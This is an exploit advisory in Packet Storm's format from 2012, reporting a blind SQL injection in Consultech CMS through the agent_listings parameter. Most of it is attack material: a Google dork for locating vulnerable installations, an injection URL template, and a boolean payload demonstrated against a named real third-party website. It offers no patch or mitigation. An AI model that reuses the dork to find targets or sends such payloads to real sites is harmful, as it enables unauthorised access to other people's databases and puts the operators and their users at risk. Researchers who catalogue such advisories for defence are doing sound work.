Consultech CMS Blind SQL Injection

2012-08-22T00:00:00
ID PACKETSTORM:115790
Type packetstorm
Reporter Crim3R
Modified 2012-08-22T00:00:00

Description

                                        
                                            `  
# Exploit Title: Consultech cms Blind Sql Injection   
  
# Google Dork: inurl:buy-results.asp?agent_listings intext:Powered by Consultech  
  
# Date: 08/22/2012  
  
# Author: Crim3R  
  
# Vendor Home : http://www.consultech.net/  
  
# Tested on: all  
==================================  
  
the agent_listings parametr is agent_listings to blind sql injection  
http://127.0.0.1/public/buy-results.asp?agent_listings=[id][Bsqli]   
  
D3m0:  
  
http://www.homefinder.org/public/buy-results.asp?agent_listings=3830146045 and   
2*5=10  
  
===============Crim3R@Att.Net=========  
  
$Home = %00  
  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir   
  
`